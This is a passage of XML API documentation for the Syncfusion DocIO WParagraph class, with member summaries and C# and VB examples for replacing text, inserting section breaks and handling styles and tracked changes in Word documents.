            <param name="textSelection">The <see cref="T:Syncfusion.DocIO.DLS.TextSelection"/> specifies the text to replace.</param>
            <returns>The <b>integer</b> that represents the count of the replacements made.</returns>
            <example>
            <para>The following code example demonstrates how to replace all the entries of a text in the paragraph.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document
                WordDocument document = new WordDocument("Template.docx");
                WParagraph paragraph = document.Sections[0].Paragraphs[1];
                //Find the first occurrence of the regular expression
                TextSelection selection = paragraph.Find(new Regex("Panda"));
                //Replace all occurrence of a particular regular expression with the text selection in the paragraph
                paragraph.Replace(new Regex("Giant panda"), selection);            
                //Save and Close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document
                Dim document As New WordDocument("Template.docx")
                Dim paragraph As WParagraph = document.Sections(0).Paragraphs(1)
                'Find the first occurrence of the regular expression
                Dim selection As TextSelection = paragraph.Find(New Regex("Panda"))
                'Replace all occurrence of a particular regular expression with the text selection in the paragraph
                paragraph.Replace(New Regex("Giant panda"), selection)
                'Save and Close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.Replace(System.Text.RegularExpressions.Regex,Syncfusion.DocIO.DLS.TextSelection,System.Boolean)">
            <summary>
            Replaces all entries of given regular expression in the paragraph with the 
            <see cref="T:Syncfusion.DocIO.DLS.TextSelection"/> along with its formatting.
            </summary>
            <param name="pattern">The <see cref="T:System.Text.RegularExpressions.Regex"/> used to find the text.</param>
            <param name="textSelection">The <see cref="T:Syncfusion.DocIO.DLS.TextSelection"/> specifies the text to replace.</param>
            <param name="saveFormatting">Set to <b>true </b> to save source formatting; otherwise, <b>false</b>.</param>
            <returns>The <b>integer</b> that represents the count of the replacements made.</returns>
            <example>
            <para>The following code example demonstrates how to replace all the entries of a text in the paragraph.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document
                WordDocument document = new WordDocument("Template.docx");
                WParagraph paragraph = document.Sections[0].Paragraphs[1];
                //Find the first occurrence of the regular expression
                TextSelection selection = paragraph.Find(new Regex("Panda"));
                //Replace all occurrence of a particular regular expression with the text selection in the paragraph
                paragraph.Replace(new Regex("Giant panda"), selection, true);            
                //Save and Close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document
                Dim document As New WordDocument("Template.docx")
                Dim paragraph As WParagraph = document.Sections(0).Paragraphs(1)
                'Find the first occurrence of the regular expression
                Dim selection As TextSelection = paragraph.Find(New Regex("Panda"))
                'Replace all occurrence of a particular regular expression with the text selection in the paragraph
                paragraph.Replace(New Regex("Giant panda"), selection, True)
                'Save and Close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.Replace(System.String,Syncfusion.DocIO.DLS.TextSelection,System.Boolean,System.Boolean)">
            <summary>
            Replaces all entries of given string in the paragraph with <see cref="T:Syncfusion.DocIO.DLS.TextSelection"/>, taking into
            consideration case sensitive and whole word options.
            </summary>
            <param name="given">The <b>string</b> represents the text to be found.</param>
            <param name="textSelection">The <see cref="T:Syncfusion.DocIO.DLS.TextSelection"/> specifies the text to replace.</param>
            <param name="caseSensitive">Set to <b>true</b> to match the case of the text similar to specified in the <paramref name="given"/> parameter; otherwise <b>false</b>.</param>
            <param name="wholeWord">Set to <b>true</b> to match the whole word of the text similar to specified in the <paramref name="given"/> parameter; otherwise <b>false</b>.</param>
            <returns>The <b>integer</b> that represents the count of the replacements made.</returns>
            <example>
            <para>The following code example demonstrates how to replace all the entries of a text in the paragraph.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document
                WordDocument document = new WordDocument("Template.docx");
                WParagraph paragraph = document.Sections[0].Paragraphs[1];
                //Find the first occurrence of the regular expression
                TextSelection selection = paragraph.Find(new Regex("Panda"));
                //Replace all occurrence of a particular regular expression with the text selection in the paragraph
                paragraph.Replace("Giant panda", selection, true, false);            
                //Save and Close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document
                Dim document As New WordDocument("Template.docx")
                Dim paragraph As WParagraph = document.Sections(0).Paragraphs(1)
                'Find the first occurrence of the regular expression
                Dim selection As TextSelection = paragraph.Find(New Regex("Panda"))
                'Replace all occurrence of a particular regular expression with the text selection in the paragraph
                paragraph.Replace("Giant panda", selection, True, False)
                'Save and Close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.Replace(System.String,Syncfusion.DocIO.DLS.TextSelection,System.Boolean,System.Boolean,System.Boolean)">
            <summary>
            Replaces all entries of given string in the paragraph with <see cref="T:Syncfusion.DocIO.DLS.TextSelection"/>, taking into
            consideration case sensitive, whole word and formatting options.
            </summary>
            <param name="given">The <b>string</b> represents the text to be found.</param>
            <param name="textSelection">The <see cref="T:Syncfusion.DocIO.DLS.TextSelection"/> specifies the text to replace.</param>
            <param name="caseSensitive">Set to <b>true</b> to match the case of the text similar to specified in the <paramref name="given"/> parameter; otherwise <b>false</b>.</param>
            <param name="wholeWord">Set to <b>true</b> to match the whole word of the text similar to specified in the <paramref name="given"/> parameter; otherwise <b>false</b>.</param>
            <param name="saveFormatting">Set to <b>true </b>if to save source formatting; otherwise, <b>false</b>.</param>
            <returns>The <b>integer</b> that represents the count of the replacements made.</returns>
            <example>
            <para>The following code example demonstrates how to replace all the entries of a text in the paragraph.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document
                WordDocument document = new WordDocument("Template.docx");
                WParagraph paragraph = document.Sections[0].Paragraphs[1];
                //Find the first occurrence of the regular expression
                TextSelection selection = paragraph.Find(new Regex("Panda"));
                //Replace all occurrence of a particular regular expression with the text selection in the paragraph
                paragraph.Replace("Giant panda", selection, true, false, true);            
                //Save and Close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document
                Dim document As New WordDocument("Template.docx")
                Dim paragraph As WParagraph = document.Sections(0).Paragraphs(1)
                'Find the first occurrence of the regular expression
                Dim selection As TextSelection = paragraph.Find(New Regex("Panda"))
                'Replace all occurrence of a particular regular expression with the text selection in the paragraph
                paragraph.Replace("Giant panda", selection, True, False, False)
                'Save and Close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.ReplaceFirst(System.String,System.String,System.Boolean,System.Boolean)">
            <summary>
            Replaces first entry of given string with replace string, taking into
            consideration caseSensitive and wholeWord options.
            </summary>
            <param name="given">The string to replace</param>
            <param name="replace">Replace string</param>
            <param name="caseSensitive">Is case sensitive replace?</param>
            <param name="wholeWord">Search for whole word?</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.ReplaceFirst(System.Text.RegularExpressions.Regex,System.String)">
            <summary>
            Replaces all entries of given regular expression with replace string.
            </summary>
            <param name="pattern"></param>
            <param name="replace"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.InsertSectionBreak">
            <summary>
            Inserts a section break. Creates new section with the break type new page.
            </summary>
            <returns>A reference to the newly created section.</returns>
            <example>
            <para>The following code example illustrates how to insert a section break.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document
                WordDocument document = new WordDocument();
                document.EnsureMinimal();
                //Add text to the first section
                document.LastParagraph.AppendText("First section");
                //Insert section break
                WSection newsection = document.LastParagraph.InsertSectionBreak();
                //Add new paragraph to the second section
                IWParagraph paragraph = newsection.AddParagraph();
                paragraph.AppendText("Second section");
                //Save and close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document
                Dim document As New WordDocument()
                document.EnsureMinimal()
                'Add text to the first section
                document.LastParagraph.AppendText("First section")
                'Insert section break
                Dim newsection As WSection = document.LastParagraph.InsertSectionBreak()
                'Add new paragraph to the second section
                Dim paragraph As IWParagraph = newsection.AddParagraph()
                paragraph.AppendText("Second section")
                'Save and close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.InsertSectionBreak(Syncfusion.DocIO.DLS.SectionBreakCode)">
            <summary>
            Inserts the section break. Creates new section with the specified break type.
            </summary>
            <param name="breakType">The <see cref="T:Syncfusion.DocIO.DLS.SectionBreakCode"/> member that specifies the break type.</param>
            <returns>A reference to the newly created section.</returns>
            <example>
            <para>The following code example illustrates how to insert a section break.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document
                WordDocument document = new WordDocument();
                document.EnsureMinimal();
                //Add text to the first section
                document.LastParagraph.AppendText("First section");
                //Insert section break
                WSection newsection = document.LastParagraph.InsertSectionBreak(SectionBreakCode.Oddpage);
                //Add new paragraph to the second section
                IWParagraph paragraph = newsection.AddParagraph();
                paragraph.AppendText("Second section");
                //Save and close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document
                Dim document As New WordDocument()
                document.EnsureMinimal()
                'Add text to the first section
                document.LastParagraph.AppendText("First section")
                'Insert section break
                Dim newsection As WSection = document.LastParagraph.InsertSectionBreak(SectionBreakCode.Oddpage)
                'Add new paragraph to the second section
                Dim paragraph As IWParagraph = newsection.AddParagraph()
                paragraph.AppendText("Second section")
                'Save and close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.GetOwnerSection">
            <summary>
            Gets the owner section.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.GetParagraphItems">
            <summary>
            Gets the paragraph items.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.ClearItems">
            <summary>
            Clears the items.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.FindAll(System.Text.RegularExpressions.Regex)">
            <summary>
            Returns all entries of given regex.
            </summary>
            <param name="pattern">The pattern.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.FindFirst(System.Text.RegularExpressions.Regex)">
            <summary>
            Returns first entry of given regex.
            </summary>
            <param name="pattern">The pattern.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.RemoveItems(System.Int32,System.Boolean)">
            <summary>
            Removes the items range.
            </summary>
            <param name="startIndex">The start index.</param>
            <param name="toEnd">if it speicifes the end, set to <c>true</c>.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.CloneWithoutItems">
            <summary>
            Clones without paragraph items.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.AppendItem(Syncfusion.DocIO.DLS.ParagraphItemType)">
            <summary>
            Appends paragraph item to the end of paragraph.
            </summary>
            <param name="itemType"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.UpdateText(Syncfusion.DocIO.DLS.WTextRange,System.String)">
            <summary>
            Updates the text.
            </summary>
            <param name="pItem">The p item.</param>
            <param name="newText">The new text.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.UpdateText(Syncfusion.DocIO.DLS.ParagraphItem,System.Int32,System.String)">
            <summary>
            Updates the text.
            </summary>
            <param name="pItem">The paragraph item.</param>
            <param name="removeTextLength">Length of the text to remove.</param>
            <param name="newText">The new text.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.ApplyStyle(Syncfusion.DocIO.DLS.IWParagraphStyle)">
            <summary>
            Applies the specified style.
            </summary>
            <param name="style">Style name</param>
            <remarks>Specified style must exist in Document.Styles collection</remarks>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.ApplyCharacterStyle(Syncfusion.DocIO.DLS.IWCharacterStyle)">
            <summary>
            Applies the specified style.
            </summary>
            <param name="style">Style name</param>
            <remarks>Specified style must exist in Document.Styles collection</remarks>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.ReplaceWithoutCorrection(System.Int32,System.Int32,System.String)">
            <summary>
            Replaces the substring.
            </summary>
            <param name="start">The start.</param>
            <param name="length">The length.</param>
            <param name="replacement">The replacement.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.AddSelf">
            <summary>
            Adds the self.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.CloneRelationsTo(Syncfusion.DocIO.DLS.WordDocument,Syncfusion.DocIO.DLS.OwnerHolder)">
            <summary>
            Clones the relations.
            </summary>
            <param name="doc"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.IsNeedToRemoveItems(Syncfusion.DocIO.DLS.Entity,Syncfusion.DocIO.DLS.ParagraphItem)">
            <summary>
             While cloning the paragraph need to remove adding the Footnotes/Comments if the owner textBody is Wcomment/WFootnote for the Alternate chunk document
            </summary>
            <param name="baseEntity"></param>
            <param name="item"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.IsNeedToAddFloatingItemsCollection(Syncfusion.DocIO.DLS.Entity)">
            <summary>
            To identify whether the current item need to be add current item into floating item collection
            </summary>
            <param name="entity">Current entity</param>
            <returns><c>true</c>if the current item is floating item, otherwise<c>false</c></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.UpdateMergeFormatting(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Updates the merge formatting.
            </summary>
            <param name="doc">The doc.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.UpdateSourceFormatting(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Updates the source formatting.
            </summary>
            <param name="doc">The doc.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.CloneStyleRelations(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Clones the style relations.
            </summary>
            <param name="doc">The doc.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.ImportStyle(Syncfusion.DocIO.DLS.IWParagraphStyle)">
            <summary>
            Imports the style to destination document.
            </summary>
            <param name="style"></param>
            <remarks></remarks>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.CloneImpl">
            <summary>
            Creates a duplicate copy of the paragraph.
            <exclude/>
            </summary>
            <returns>The reference of the newly created paragraph.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.CloneParagraph(System.Boolean)">
            <summary>
            Clones itself without paragraph items.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.GetParagraphText(System.Boolean)">
            <summary>
            Clones the paragraph as text only.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.IsPreviousParagraphMarkIsHidden">
            <summary>
            Determines whether the previous paragraph mark is hidden. 
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.IsPreviousParagraphHasContent">
            <summary>
            Checks wheather the previous paragraph has contents 
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.GetText(System.Int32,System.Int32)">
            <summary>
            Gets the text.
            </summary>
            <param name="startIndex">The start index.</param>
            <param name="endIndex">The end index.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.ApplyBaseStyleFormats">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.IsEmptyParagraph">
            <summary>
            Determine whether the paragraph having only the empty spaces and bookmarks
            </summary>
            <param name="paragraph"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.CheckFormFieldName(System.String)">
            <summary>
            Checks the name of the form field.
            </summary>
            <param name="formFieldName">Name of the form field.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.ApplyListStyle(Syncfusion.DocIO.DLS.BuiltinStyle)">
            <summary>
            Applies the list style.
            </summary>
            <param name="builtinStyle">The built-in style.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.CheckNormalStyle">
            <summary>
            Checks the normal style.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.Close">
            <summary>
            Closes the item.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.ApplyListParaStyle">
            <summary>
            Applies the list paragraph style.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.GetLastFieldType">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.GetLastField">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.CreateEmptyParagraph">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.IsParagraphHasSectionBreak">
            <summary>
            Determine whether the paragraph has section break
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.IsSectionEndMark">
            <summary>
            Determines whether the paragraph is section end mark.
            </summary>
            <returns>
            	<c>true</c> if the paragraph is section end mark; otherwise, <c>false</c>.
            	Whether the paragraph's having childentites and checked the IsEmptyParagraph method.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.ModifyText(System.String)">
            <summary>
            Modifies the text.
            </summary>
            <param name="text">The text.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.MakeChanges(System.Boolean)">
            <summary>
            Accepts or rejects changes tracked from the moment of last change acceptance.
            </summary>
            <param name="acceptChanges">if it accepts changes, set to <c>true</c>.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.RemoveCFormatChanges">
            <summary>
            Removes the character format changes.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.RemovePFormatChanges">
            <summary>
            Removes the paragraph/table format changes.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.AcceptCChanges">
            <summary>
            Accepts the changes for character format.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.AcceptPChanges">
            <summary>
            Accepts changes in paragraph/table format.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.CheckChangedPFormat">
            <summary>
            Defines whether paragraph format is changed.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.CheckInsertRev">
            <summary>
            Checks a value indicating whether this item was inserted to the document,
            when "Track Changes" is or was set to "true".
            </summary>
            <returns></returns>
            <value>
            	if this instance was inserted, set to <c>true</c>.
            </value>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.CheckDeleteRev">
            <summary>
            Checks a value indicating whether this item was deleted from the document,
            when "Track Changes" is or was set to "true".
            </summary>
            <returns></returns>
            <value>
            	if this instance is delete revision, set to <c>true</c>.
            </value>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.CheckChangedCFormat">
            <summary>
            Defines whether format was changed.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.CheckOnRemove">
            <summary>
            Checks whether full paragraph can be removed. 
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.HasTrackedChanges">
            <summary>
            Determines whether item has tracked changes.
            </summary>
            <returns>
            	if has tracked changes, set to <c>true</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.SetDeleteRev(System.Boolean)">
            <summary>
            Sets the delete rev.
            </summary>
            <param name="check">if specifies delete revision, set to <c>true</c>.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.SetInsertRev(System.Boolean)">
            <summary>
            Sets the insert rev.
            </summary>
            <param name="check">if it specifies insert revision, set to <c>true</c>.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.SetChangedCFormat(System.Boolean)">
            <summary>
            Sets the changed C format.
            </summary>
            <param name="check">if it specifies formatting, set to <c>true</c>.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.SetChangedPFormat(System.Boolean)">
            <summary>
            Sets the changed P format.
            </summary>
            <param name="check">if it specifies changed format, set to <c>true</c>.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.GetNextTextBodyItem">
            <summary>
            Gets Next the text body item in the document.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.WriteXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter)">
            <summary>
            Writes object data as xml attributes.
            <exclude/>
            </summary>
            <param name="writer">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.InitXDLSHolder">
            <summary>
            Registers paragraph elements for xml serialization.
            <exclude/>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.RestoreReference(System.String,System.Int32)">
            <summary>
            Restores object references after deserialization.
            <exclude/>
            </summary>
            <param name="name">The <b>string </b> that specifies the name.</param>
            <param name="index">The zero-based index.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.IsFirstLine(Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Determines whether the specified layouted widget is first line of the paragrph.
            </summary>
            <param name="ltWidget">The lt widget.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.GetPreviousSibling(Syncfusion.Layouting.IWidget)">
            <summary>
            Gets previous widget
            </summary>
            <param name="widget"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.IsLastLine(Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Determines whether the specified layouted widget is last line of the paragrph.
            </summary>
            <param name="ltWidget">The lt widget.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.GetNextSibling(Syncfusion.Layouting.IWidget)">
            <summary>
            Gets Next widget
            </summary>
            <param name="widget"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.Syncfusion#Layouting#IWidget#InitLayoutInfo">
            <summary>
            Initializing LayoutInfo to null
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.CreateLayoutInfo">
            <summary>
            Creates layout information.
            <exclude/>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.IsHiddenParagraph">
            <summary>
            Determine whether the current paragraph is need to be hidden
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.SplitByLineBreak(Syncfusion.DocIO.DLS.ParagraphItemCollection)">
            <summary>
            Splits the widget by line break.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.GetOwnerBaseEntity(Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Gets the owner base entity.
            </summary>
            <param name="entity">The entity</param>
            <returns>returns the baseEntity</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.IsFirstParagraphOfOwnerTextBody">
            <summary>
            Determine the whether the paragraph is the firstparagraph of the owner text body.
            </summary>
            <returns>returns the IsFirstParagraphOfOwnerTextBody</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.IsFirstParagraphOfTextBody(Syncfusion.DocIO.DLS.Entity,Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Checks whether the childEntity is the first child of ownerBaseEntity or not.
            </summary>
            <param name="parent">The owner Base Entity</param>
            <param name="child">The child entity</param>
            <returns>returns the isFirstParagraph</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.IsSkipCellMark">
            <summary>
            Determines whether to skip cell mark layouting.
            For the cell mark present after a table in nested tables.
            </summary>
            <returns>
            	<c>true</c> if is skip cell mark; otherwise, <c>false</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.GetHeight(Syncfusion.DocIO.DLS.WParagraph,Syncfusion.DocIO.DLS.ParagraphItem)">
            <summary>
            Returns the first inline item height of the current paragraph.
            </summary>
            <param name="paragraph">The paragraph to which the height of first item to be found.</param>
            <param name="paraItem">The <see cref="T:Syncfusion.DocIO.DLS.ParagraphItem"/> that specifies the first item in the paragraph.</param>
            <returns>The <b>float</b> represents the height of the first item in the paragraph.</returns>
            <remarks>This method is not supported in Silverlight, WinRT, Windows Phone, Universal, Universal Windows Platform, MVC6 and Xamarin platforms.</remarks>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.GetSize(Syncfusion.DocIO.DLS.ParagraphItem,System.Single)">
            <summary>
            Returns the height of the specified paragraph item.
            </summary>
            <param name="paraItem">The paragraph item to get the height.</param>
            <param name="height">The <b>float </b> that specifies the height of the break character in the paragraph.</param>
            <returns>The <b>float</b> represents the height of the paragraph item.</returns>
            <remarks>This method is not supported in Silverlight, WinRT, Windows Phone, Universal, Universal Windows Platform and Xamarin platforms.</remarks>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.IsAdjacentParagraphHaveSameBorders(Syncfusion.DocIO.DLS.WParagraph,System.Single)">
            <summary>
            Determine whether the current paragraph is having the same border values of Adjacent paragraphs
            </summary>
            <param name="adjacentParagraph">Adjacent paragraph </param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.IsSameAdjacentBorder(Syncfusion.DocIO.DLS.Border,Syncfusion.DocIO.DLS.Border)">
            <summary>
            Determine whether the border properties are equivalent to Adjacent border
            </summary>
            <param name="border"></param>
            <param name="adjacentBorder"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.IsSameLeftIndent(Syncfusion.DocIO.DLS.WParagraph,System.Single)">
            <summary>
            To ensure wether current paragraph and adjacent paragraph is having same left indent value
            </summary>
            <param name="adjacentParagrph">Adjacent paragraph</param>
            <param name="firstParaLeftPosition">Current paragraph left indent position</param>
            <returns><c>true</c>when the two paragraphs are having same left indent value, otherwise<c>false</c></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.GetDefaultTabWidth">
            <summary>
            Get the default tab width
            </summary>
            <param name="paragraphFormat">Paragraph</param>
            <returns>Default tab width value</returns>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraph.HasSDTInlineItem">
            <summary>
            Handled for preservation of inline SDT items in Doc to PDF conversion.
            Defines whether the paragraph has SDT inline items or not.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraph.SplitWidgetContainerDrawn">
            <summary>
            Gets or sets a value indicating whether the splitwidget is drawn or not
            </summary>
            <value>
              <c>true</c> if the splitwidget is drawn; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraph.IsStyleApplied">
            <summary>
            Gets or sets a value indicating whether the style is applied
            </summary>
            <value>
              <c>true</c> if the style is applied; otherwise, <c>false</c>.
            </value>      
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraph.IsNeedToMeasureBookMarkSize">
            <summary>
            Gets the boolean value to indicate whether need to measure size of the BookMarks
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraph.EntityType">
            <summary>
            Gets the type of the entity. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.EntityType"/> of the current item.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraph.ChildEntities">
            <summary>
            Gets the child elements of the paragraph. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.EntityCollection"/> .</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraph.StyleName">
            <summary>
            Gets the name of the style applied to the current paragraph. Read-only.
            </summary>
            <value>The <b>string</b> that represents the style name.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraph.Text">
            <summary>
            Gets or sets text of the paragraph.
            </summary>
            <value>The <b>string </b>that represents the text.</value>
            <remarks>All the internal formatting will be cleared when new text is set.</remarks>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraph.Item(System.Int32)">
            <summary>
            Gets the paragraph item at the specified index. Read-only.
            </summary>
            <param name="index">The zero-based index of the item to get from the collection.</param>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.ParagraphItem"/> at the specified index.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraph.Items">
            <summary>
            Gets the collection of <see cref="T:Syncfusion.DocIO.DLS.ParagraphItem"/> in the current paragraph. Read-only.
            </summary>
